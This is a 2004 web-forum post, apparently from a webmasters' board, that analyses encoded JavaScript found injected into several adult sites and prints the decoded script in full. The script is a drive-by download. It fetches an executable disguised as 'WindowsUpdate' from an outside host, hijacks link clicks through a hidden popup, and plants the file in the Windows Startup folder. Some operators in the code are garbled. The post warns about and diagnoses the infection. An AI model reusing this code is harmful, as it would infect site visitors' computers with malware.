Thread: Virus alerts on TGP's
View Single Post
Old 10-31-2004, 08:29 PM  
Germes
Registered User
 
Join Date: Jul 2003
Posts: 24
Snake, this code was found on snakesworld and pornno from many machines (mostly UNIX), so I doubt they all could be infected.

Please show us code you have between

Copyright
1997-2004</FONT></FONT>
</CENTER>

and

</BODY></HTML>

We all see there encoded javascript.
Here you can see this script decoded:

var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;

function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}

uploaded=BadBrowser();


if(!uploaded)
{
burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
}

function initpop()
{
if(!pop)
{
pop=window.createPopup();
var oBody = pop.document.body;


pop.document.bgColor="black";
oBody.style.border = "solid black 0px";
oBody.style.position="absolute";
oBody.style.left= "0";
oBody.style.top= "0";
var temp;
temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\" ).style.visibility=\"hidden\"' ";
temp+=
"onMouseOut='document.getElementById(\"client\").s tyle.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").s tyle.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_fr ame\").style.visibility=\"visible\";parent.pop.sho w(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


oBody.innerHTML=temp;
}
}

function clean()
{
uploaded=1;
if(pop)
pop.hide();
}

if(!uploaded)
{
initpop();
window.onbeforeunload=clean;
}


function DoClick()
{
document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;";
window.setTimeout('obj.click();',300);
}

function showpop()
{
if(uploaded)
return;
obj=window.event.srcElement;
if(!pop)
{
initpop();
}

pop.show(window.event.screenX,window.event.screenY ,1,1);
document.getElementById("i_frame").style.left=wind ow.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
document.getElementById("i_frame").style.top=windo w.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}


function SetAllEvents()
{
if(pop.document.readyStatehahahaha"complete" && totalobj!=document.all.length)
{
totalobj=document.all.length;
for(i = 0; i < document.all.length; i++){
if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
document.all(i).onmousemove=showpop;}
}
setTimeout("SetAllEvents();", 400);
}

if(!uploaded)
{
setTimeout("SetAllEvents();", 400);
window.setTimeout('window.defaultStatus=" "',2000);

document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;l eft=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url (#default#AnchorClick);"></a>');
document.getElementById("clientcall").click();
document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}
__________________
http://www.germesia.com/
Germes is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote